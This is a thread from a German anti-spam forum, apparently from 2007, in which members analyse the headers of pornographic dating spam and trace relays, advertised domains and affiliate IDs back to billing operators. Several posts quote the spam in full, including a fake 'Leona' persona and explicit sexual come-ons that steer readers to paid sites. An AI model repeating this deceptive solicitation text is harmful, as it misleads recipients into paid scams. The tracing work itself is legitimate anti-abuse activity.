In unserer Datenbank findest Du mehr als 250,000 Profile fickgeiler Schlampen, die es mal wieder so richtig besorgt bekommen wollen.

http://skt.netcompany.cc/de/index.html

...und entscheide Dich fur mich! Mein Username ist Leona33-allone
bis dann...



Deine scharfe LEONA -:)

Gerlach
12.08.2007, 22:27
Und wieder:
Return-Path: <Dabney7499 [at] amuro.net>
Delivery-Date: Sun, 12 Aug 2007 xx:xx:xx +0200
Received-SPF: none (mxeu10: 202.96.103.1 is neither permitted nor denied by domain of amuro.net) client-ip=202.96.103.1; envelope-from=Dabney7499 [at] amuro.net; helo=dcb.hz.zj.cn;
Received: from [202.96.103.1] (helo=dcb.hz.zj.cn)
by mx.kundenserver.de (node=mxeu10) with ESMTP (Nemesis),
ID: [ID filtered]
Received: from 218.71.138.250 ([220.191.169.46])
by dcb.hz.zj.cn (8.11.6/8.11.6) with SMTP ID: [ID filtered]
Mon, 13 Aug 2007 xx:xx:xx +0800 (CST)
Message-ID: [ID filtered]
To: ???@???.de, ???@???.de, ???@???.de,
???@???.de
Cc: ???@???.de, ???@???.de,
???@???.de
From: "Maria Gulich" <Dabney7499 [at] amuro.net>
Subject: Re: Fwd: Dein nächster Fick wartet schon auf Dich!
Date: Sun, 12 Aug 2007 xx:xx:xx GMT
MIME-Version: 1.0
Content-Type: text/html; charset=iso-8859-1
Reply-To: Dabney7499 [at] amuro.net
X-MimeOLE: Produced by Microsoft MimeOLE V5.00.3018.1300
Envelope-To: ???@???.de
Neue beworbene Domain:
http://www.netcompany.cc/de/index.html
Altes Forwarding nach:
http://www1.cybilling.com/anmeldung/lz_anmelden.php

Gerlach
14.08.2007, 17:50
Und wieder:
Received: from 213.148.130.51 (213.148.130.51) by www.q-dial.de
with SMTP; Tue, 14 Aug 2007 xx:xx:xx +0200 (CEST)
Received: from localhost (localhost [127.0.0.1])
by q02.qsc.de (QSC AG mail system) with ESMTP ID: [ID filtered]
for <???@???.de>; Tue, 14 Aug 2007 xx:xx:xx +0200 (CEST)
X-Virus-Scanned: by QSC AG mail system
Received: from ipc603.indiatimes.com (ipc603.indiatimes.com [203.199.93.226])
by q02.qsc.de (QSC AG mail system) with ESMTP ID: [ID filtered]
for <???@???.de>; Tue, 14 Aug 2007 xx:xx:xx +0200 (CEST)
Received: from unknown (HELO mb5.indiatimes.com) ([192.168.58.232])
by ipc603.indiatimes.com with ESMTP; 14 Aug 2007 xx:xx:xx +0530
Date: Tue, 14 Aug 2007 xx:xx:xx +0530 (IST)
From: award2074 [at] indiatimes.com
To: ???@???.de, ???@???.de
Message-ID: [ID filtered]
Subject: Fwd: Re: Du willst Heute noch realen Sex haben? ( Problem Noch)
MIME-Version: 1.0
Content-Type: text/plain; charset=utf-8
Content-Transfer-Encoding: quoted-printable
X-Originating-IP: [127.0.0.1]

Beworben wird
http://skt.netcompany.cc/de/index.html
was wie immer forward macht nach
http://www2.cybilling.com/anmeldung/lz_anmelden.php

Da muntert das Schreiben der Wettbewerbszentrale von heute nur ein wenig auf, man würde den Wettbewerbsverstoß prüfen (Aktenzeichen F 8 0057/05).

TheRave
23.08.2007, 20:37
Ist das auch Cyberservices?
Received: from mail.informiert-sein.com (mail.informiert-sein.com [84.246.240.226])

Goofy
23.08.2007, 21:45
Ist das auch Cyberservices?

Mit dieser unvollständigen Headerangabe kann man das nicht sagen. Außerdem braucht man dazu die beworbene Domain (aber bitte nicht den ganzen verf.... Spamtext hier einstellen).

TheRave
24.08.2007, 19:59
Dachte das reicht wenn man den Absender hat. Aber hier ist noch mehr vom Header.

Return-Path: <bounce[BOUNCE filtered]@mail.informiert-sein.com>
X-Original-To: ???@arcor.de
Received: from mail-in-04.arcor-online.net (mail-in-04.arcor-online.net [151.189.21.44])
by mail-in-13-z2.arcor-online.net (Postfix) with ESMTP ID: [ID filtered]
for <???@arcor.de>; Thu, 23 Aug 2007 xx:xx:xx +0200 (CEST)
Received: from mail.informiert-sein.com (mail.informiert-sein.com [84.246.240.226])
by mx.arcor.de (Postfix) with SMTP ID: [ID filtered]
for <???@arcor.de>; Thu, 23 Aug 2007 xx:xx:xx +0200 (CEST)
From: "FKK News" <fkk [at] informiert-sein.com>
To: ???@arcor.de
Subject: AW: Bilder vom Strand
Date: Wed, 22 Aug 2007 xx:xx:xx +0200
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="MIMEBoundary4d1e8bb2b190285dffe45898a044f266"
List-Unsubscribe: <mailto:leave-list13-?[UNSUB filtered]>
Message-ID: [ID filtered]

Beworbene URL: http://www.online-top-10.com/fkk_treffpunkte/

Fragt mich jetzt aber nicht wie die zu meiner Emailadresse kommen.

Goofy
25.08.2007, 00:41
Fragt mich jetzt aber nicht wie die zu meiner Emailadresse kommen.

So wie die Jungfrau zum Kind. :clown:

Lies dazu auch mal das hier:

http://www.antispam-ev.de/wiki/Methoden_der_Spammer#Wie_kommt_der_Spammer_an_Ihre_e-Mailaddresse.3F
http://www.antispam-ev.de/wiki/E-Mail-Spam_vermeiden

Die Domain steht beim Spammerregistrar Enom, sieht auch von der Handschrift ganz nach unseren holländisch/hamburgischen Freunden mit glatzköpfigem Jugendschützer aus.

Investi
25.08.2007, 00:51
Gehört zu Maxolution/Partnercash.

TheRave
26.08.2007, 15:23
Danke für die Links. Nur wenn man schon in der Liste ist hilft das auch nicht viel. Ich denke ich hab mit meinen 15 Emailadressen die auch mal öfter geändert werden schon viel getan um einigermaßen Ruhe zu haben. Nur irgendwann haben sie eben doch meine "Privatadresse" erwischt die ich eigentlich nicht so einfach weitergebe und die sich auch nicht ändern soll.

Jetzt würde mich noch interessieren wie man dahinter kommt wer dahinter steckt. Wenn ich auf den Whois Link klicke, steht da weder was von Enom noch was von Maxolution/Partnercash. Aber irgendwie muss das ja gehen.

Goofy
26.08.2007, 15:39
Ganz einfach: wenn man sich auf der Webseite zum "Anmelden" durchklickt, landet man bei Digitalpayment, dort steht im Impressum Maxxolution.

Mit einem whois-Tool wie z.B.

http://centralops.net/co/DomainDossier.aspx
(aber auch in der Antispam-whois-Abfrage)

siehst Du, dass die Domain von enom registriert wurde. Ein bekannter, notorischer Spammer-Registrar. Beste Kunden: Cyberservices, Maxxolution, aber auch die russische Spam-Mafia.

TheRave
27.08.2007, 20:08
Upps, ja stimmt in der beworbenen Seite, in der Hauptdomain dort im Impressum da steht auch so ein Dr. drin. Hatte ja ganz vergessen das man auf den Link in der Email auch raufklicken kann...

Mit deiner Whois Abfrage sehe ich Enom jetzt auch, allerdings nicht mit der vom Board hier.

Ich schick jetzt Einmal am Tag alles was reinkommt an SpamCop.

Gool
06.09.2007, 14:48
Nach langer Zeit habe ich auch mal wieder ekligen Porno-Spam von Cyberservices erhalten:

Return-Path: <laura [at] ono.com>
Delivered-To: #
Received: (qmail 7983 invoked from network); 6 Sep 2007 xx:xx:xx -0000
Received: from unknown ([80.67.18.7])
by xaroco.ispgateway.de (qmail-ldap-1.03) with QMQP; 6 Sep 2007 xx:xx:xx -0000
Delivered-To: CLUSTERHOST mx07.ispgateway.de #
Received: (qmail 16897 invoked from network); 6 Sep 2007 xx:xx:xx -0000
X-Spam-Checker-Version: SpamAssassin 3.2.2 (2007-07-23) on
spamfilter18.ispgateway.de
X-Spam-Level: **
X-Spam-Status: No, hits=3.0 required=9999.0 tests=BAYES_50,RCVD_IN_DSBL,
RDNS_DYNAMIC,TVD_RCVD_IP autolearn=disabled version=3.2.2
Received: from 213.231.108.25.dyn.user.ono.com (HELO ono.com) ([213.231.108.25])
(envelope-sender <poor [at] spamvictim.tld>)
by mx07.ispgateway.de (qmail-ldap-1.03) with SMTP
for <#>; 6 Sep 2007 xx:xx:xx -0000
Message-ID: [ID filtered]
Date: Thu, 06 Sep 2007 xx:xx:xx -0100
Reply-To: <laura [at] ono.com>
From: <laura [at] ono.com>
MIME-Version: 1.0
To: <#>
Subject: Pamela und Penny info
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit


http://smarg8u.batcave.net/10.html

http://roflkartoffel.nm.ru/10.html

Die beiden Links leiten über eine Brückenseite weiter auf http://www.mutterundtochter.tv mit der WMID: [ID filtered]

exe
01.10.2007, 08:03
Cybermüll mal wieder:

Received: from ipc603.indiatimes.com (ipc603.indiatimes.com [203.199.93.226])
(using TLSv1 with cipher RC4-SHA (128/128 bits))
(Client CN "IronPort Appliance Demo Certificate", Issuer "IronPort Appliance Demo Certificate" (not verified))
by mail.*.de (*) with ESMTP ID: [ID filtered]
for <webmaster@*.de>; Mon, 1 Oct 2007 05:*:* +0200 (CEST)
Received: from unknown (HELO mb5.indiatimes.com) ([192.168.58.232])
by ipc603.indiatimes.com with ESMTP; 01 Oct 2007 09:*:* +0530
Date: Mon, 1 Oct 2007 09:*:* +0530 (IST)
From: appeal*@indiatimes.com
To: *
Cc: *
Message-ID: [ID filtered]
Subject: Fwd: Lerne heisse Singles aus Deiner Umgebung kennen
MIME-Version: 1.0
X-Originating-IP: [127.0.0.1]
Content-Type: text/plain;
charset="utf-8"
Content-Transfer-Encoding: base64


N A M E : Leona, A L T E R : 33, B E R U F : Hausfrau

Na, mein Geiler!

Ist dir auch schon so heiss wie mir? Ich habe einfach die Nase voll, dass mein Mann nie zu Hause ist und mir meine Bedurfnisse nicht befriedigen kann. Jetzt bin ich gezwungen mir einen richtigen Lover zu suchen, der mich wieder mal so richtig durchbumst! Wenn du also mein Lover sein willst, egal ob fur eine Nacht oder fur Langzeitbeziehungen, ich bin fur beides zu haben!

Hol dir jetzt einfach einen Zugang fur 5 Euro, du findest mich mit dem Usernamen Leona33-allone, ich habe dort meine Heimadresse und meine Handynummer hinterlassen, melde dich bei mir und besuche mich, oder ich komme zu dir.

http://skt.bigconcert.cc/de/index.html

Schau Dich jetzt auf der grossten, deutschsprachigen Kontaktdatenbank (Deutschland, Osterreich, Die Schweiz) um, denn hier findest Du die Frauen, die genau das gleiche suchen wie Du!

In unserer Datenbank findest Du mehr als 250,000 Profile fickgeiler Schlampen, die es mal wieder so richtig besorgt bekommen wollen.

http://skt.bigconcert.cc/de/index.html

...und entscheide Dich fur mich! Mein Username ist Leona33-allone
bis dann...



Deine scharfe LEONA -:)


Abgeworfen über Indien 203.199.93.226.
Verdienen möchte WMID=71793: http://www.cybilling.com/anmeldung/lz_anmelden.php?WMID=71793...

antispam2006
02.10.2007, 05:25
Bei mir auch aufgeschlagen. Interessant von wo eingeliefert wurde
159.145.15.111 Der IP-Block ist mir in letzter Zeit mehrmals aufgefallen.

Return-Path: <dew6012 [at] surfy.net>
X-Flags: 1001
Delivered-To: GMX delivery to poor [at] spamvictim.tld
Received: (qmail 23037 invoked by alias); 2 Oct 2007 xx:xx:xx -0000
Delivered-To: GMX delivery to poor [at] spamvictim.tld
Received: (qmail 23007 invoked by alias); 2 Oct 2007 xx:xx:xx -0000
Delivered-To: GMX delivery to poor [at] spamvictim.tld
Received: (qmail invoked by alias); 02 Oct 2007 xx:xx:xx -0000
Received: from dcamail.dca.ca.gov (EHLO dca.ca.gov) [159.145.15.111]
by mx0.gmx.net (mx089) with SMTP; 02 Oct 2007 xx:xx:xx +0200
Received: from ([159.145.1.34])
by ironmail.dca.ca.gov with ESMTP with TLS ID: [ID filtered]
Mon, 01 Oct 2007 xx:xx:xx -0700
Received: from app.dca.ca.gov (app.dca.ca.gov [159.145.15.101])
by mars.dca.ca.gov (Switch-3.1.3/Switch-3.1.0) with ESMTP ID: [ID filtered]
Mon, 1 Oct 2007 xx:xx:xx -0700 (PDT)
Received: from app.dca.ca.gov (app.dca.ca.gov [159.145.15.101])
by app.dca.ca.gov (8.11.7p3+Sun/8.11.7) with SMTP ID: [ID filtered]
Mon, 1 Oct 2007 xx:xx:xx -0700 (PDT)
Message-ID: [ID filtered]

Goofy
02.10.2007, 19:07
Der IP-Block ist mir in letzter Zeit mehrmals aufgefallen.



State of CA, Dept. of Consumer Affairs (DCA) :eek:

Also das staatliche(!) Verbraucherschutzbüro von Kalifornien. :sick:

Am besten mal ne LART an pdoyle[at]dca.ca.gov
Die sollen ihren Zombie stilllegen!

antispam2006
06.10.2007, 18:07
Und neuer Muell im Umlauf

Received: from unknown (HELO pierremoustiers.com) [218.27.164.71]

Abichayil und Adriana sind zwei verdorbene Bitches...

Gleich auf http://www.vd.hartgenommen.org

oder

Received: from unknown (HELO ltwservices.com) [222.245.83.161]

Rachel freut sich gaenzlich auf ihren ...bla bla bla

Sofort hier http://www.hvyo.ihrgeilerpopo.org

oder

Received: from p1127-ipbf315souka.saitama.ocn.ne.jp (HELO ocn.ne.jp) [122.24.84.127]

Abelia und Andrea sind zwei feuchte Frauen.

Jetzt da http://www.lwix.maedchen-gevoegelt.org

Weiterleitung nat. auf memberarea.tv bzw. cybilling.com

Gerlach
07.10.2007, 10:01
Return-Path: <srfalesmnyyi [at] ocn.ne.jp>
Delivery-Date: Sun, 07 Oct 2007 xx:xx:xx +0200
Received-SPF: fail (mxeu23: domain of ocn.ne.jp does not designate 58.88.195.180 as permitted sender) client-ip=58.88.195.180; envelope-from=srfalesmnyyi [at] ocn.ne.jp; helo=ocn.ne.jp;
Received: from [58.88.195.180] (helo=ocn.ne.jp)
by mx.kundenserver.de (node=mxeu23) with ESMTP (Nemesis)
ID: [ID filtered]
Message-ID: [ID filtered]
Date: Sun, 07 Oct 2007 xx:xx:xx -0500
Reply-To: "Darrin" <srfalesmnyyi [at] ocn.ne.jp>
From: "Darrin" <srfalesmnyyi [at] ocn.ne.jp>
User-Agent: Mozilla 4.7 [en] (Win98; I)
X-Accept-Language: en-us
MIME-Version: 1.0
To: "Gillian Ferguson" <???@???.de>
Subject: Petra geil
Content-Type: text/plain;
charset="us-ascii"
Content-Transfer-Encoding: 8bit
X-Antivirus: avast! (VPS 000778-5, 2007/10/06), Outbound message
X-Antivirus-Status: Clean
Envelope-To: ???@???.de
http://www.iijl.fickihrenpopo.org
Weiterleitung auf:
http://www2.cybilling.com/anmeldung/lz_anmelden.php?WMID=71972&PID=1&WMEC=5&PGID=212&

kjz1
07.10.2007, 18:51
Auch hier:

Received: from 122x211x117x65.ap122.ftth.ucom.ne.jp (HELO ucom.ne.jp) [122.211.117.65] by mx0.gmx.net (mx110) with SMTP; 07 Oct 2007 xx:xx:xx +0200

http://www.kt.ihrgeilerpopo.org

leitet weiter auf:

http://www.memberarea.tv

mit der WMID=71972.

zudem gibt es da noch:

ns1.meinknackarsch.org A 83.141.103.246
ns2.meinknackarsch.org A 83.141.103.246
hartgefikkt.org A 83.141.103.246
www.ty.hartgefikkt.org CNAME hartgefikkt.org
maedchen-gevoegelt.org A 83.141.103.246
www.pl.maedchen-gevoegelt.org CNAME maedchen-gevoegelt.org
www.yto.maedchen-gevoegelt.org CNAME maedchen-gevoegelt.org
www.zx.maedchen-gevoegelt.org CNAME maedchen-gevoegelt.org



- kjz

Gerlach
07.10.2007, 18:58
Received: from 213.148.130.51 (213.148.130.51) by www.q-dial.de
with SMTP; Sun, 07 Oct 2007 xx:xx:xx +0200 (CEST)
Received: from localhost (localhost [127.0.0.1])
by q02.qsc.de (QSC AG mail system) with ESMTP ID: [ID filtered]
for <???@???.de>; Sun, 7 Oct 2007 xx:xx:xx +0200 (CEST)
X-Virus-Scanned: by QSC AG mail system
Received: from pikara.ne.jp (opt-125-215-102-213.client.pikara.ne.jp [125.215.102.213])
by q02.qsc.de (QSC AG mail system) with SMTP ID: [ID filtered]
for <???@???.de>; Sun, 7 Oct 2007 xx:xx:xx +0200 (CEST)
Message-ID: [ID filtered]
Date: Sun, 07 Oct 2007 xx:xx:xx +1000
Reply-To: "Shantay Peterson" <dryrunalkaie [at] pikara.ne.jp>
From: "Shantay Peterson" <dryrunalkaie [at] pikara.ne.jp>
User-Agent: Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)
MIME-Version: 1.0
To: "Twanna Hayes" <???@???.de>
Subject: Kalama sofort genagelt :-)
Content-Type: text/plain;
charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

http://www.oeni.direktgefickt.com/da

Und die leiten auf:
http://www.memberarea.tv/members/index.php?WMID=71972&PID=1&WMEC=5&PGID=219&
http://www.peter-enis.com/de/join.php?WMID=71972&PID=1&WMEC=5&PGID=219&
http://www2.cybilling.com/anmeldung/lz_anmelden.php?WMID=71972&PGID=219&LID=50203&PID=1&WMEC=5&KTM=sz&adsid=71972&org=

antispam2006
08.10.2007, 20:01
Ich scheine ein Abo im Cyberspam- und Titanspammerclub gezogen zu haben. Noch jemand eine Einladung bekommen?

Return-Path: <nobody [at] icssl-a00.titan-networks.net>
X-Flags: 1001
Delivered-To: GMX delivery to poor [at] spamvictim.tld
Received: (qmail 16071 invoked by alias); 8 Oct 2007 xx:xx:xx -0000Delivered-To: GMX delivery to info [at] titan-networks.net
Received: (qmail 16038 invoked by alias); 8 Oct 2007 xx:xx:xx -0000Delivered-To: GMX delivery to info [at] titan-networks.net
Received: (qmail invoked by alias); 08 Oct 2007 xx:xx:xx -0000
Received: from icssl-a00.titannetworks.nl (EHLO icssl-a00.titan-networks.net) [217.173.158.161]
by mx0.gmx.net (mx033) with SMTP; 08 Oct 2007 xx:xx:xx +0200
Received: from icssl-a00.titan-networks.net (localhost [127.0.0.1])
by icssl-a00.titan-networks.net (8.13.4/8.13.4/Debian-3sarge3) with ESMTP ID: [ID filtered]
Mon, 8 Oct 2007 xx:xx:xx +0200Received: (from nobody [at] localhost)
by icssl-a00.titan-networks.net (8.13.4/8.13.4/Submit) ID: [ID filtered]
Mon, 8 Oct 2007 xx:xx:xx +0200Date: Mon, 8 Oct 2007 xx:xx:xx +0200Message-ID: [ID filtered]
To: poor [at] spamvictim.tld
Subject: Bestätigung - Dein Eintrag im Newsletter
From: news [at] sexstartseite.com


Fuer info [at] titan-networks.net !

Vielen Dank!
Dein Eintrag wurde aufgenommen.
Zur Bestätigung, dass es sich auch um Deine Mail handelt klicke bitte auf den nachfolgenden Bestätigungslink. :D

Damit wird den Wunsch den Newsletter zu erhalten aktiviert.
http://www.sexstartseite.com/Mail/add.php?ID=319&date=200619120854565

Ich habe den Link mal nicht aktiviert, braucht man bei Cyberspam sowieso nicht. :D

Gruß Antispam2006

antispam2006
09.10.2007, 22:31
Ich habe den Link mal nicht aktiviert, braucht man bei Cyberspam sowieso nicht. :D

Das kommt jetzt aber überraschend......

Return-Path: newsletter [at] cam-content.com
X-Flags: 1001
Delivered-To: GMX delivery to poor [at] spamvictim.tld
Received: (qmail 14839 invoked by alias); 9 Oct 2007 xx:xx:xx -0000
Delivered-To: GMX delivery to poor [at] spamvictim.tld
Received: (qmail 14795 invoked by alias); 9 Oct 2007 xx:xx:xx -0000
Delivered-To: GMX delivery to poor [at] spamvictim.tld
Received: (qmail invoked by alias); 09 Oct 2007 xx:xx:xx -0000
Received: from mail.voyeure.com (EHLO mail.voyeure.com) [62.159.132.250]
by mx0.gmx.net (mx021) with SMTP; 09 Oct 2007 xx:xx:xx +0200
Received: from asterix ([192.168.105.217]) by mail.voyeure.com with
Microsoft SMTPSVC(6.0.3790.3959);
Tue, 9 Oct 2007 xx:xx:xx +0200
From: "Newsletter" newsletter [at] cam-content.com
To: poor [at] spamvictim.tld
Date: Tue, 09 Oct 2007 xx:xx:xx +0200
Subject: +++ NEWSLETTER +++ (Werbung)
MIME-Version: 1.0
Content-Type: multipart/related;boundary="_=aspNetEmail=_685459a69287449d98106cb051b294b2"
Content-Transfer-Encoding: 7bit
X-Mailer: aspNetEmail ver 1.4.0.26513
X-RCPT-TO: info [at] cam-content.com
Message-ID: [ID filtered]
X-OriginalArrivalTime: 09 Oct 2007 xx:xx:xx.0495 (UTC)
FILETIME=[C80A7FF0:01C80A4D

Eingeliefert von voyeure.com 62.159.132.250
Bespammt wird www.cam2cam.de

Na schauen wir mal. Geht es nur mir so oder hat Cyberspam wieder massiv an Spams zugelegt?

Gruß Antispam2006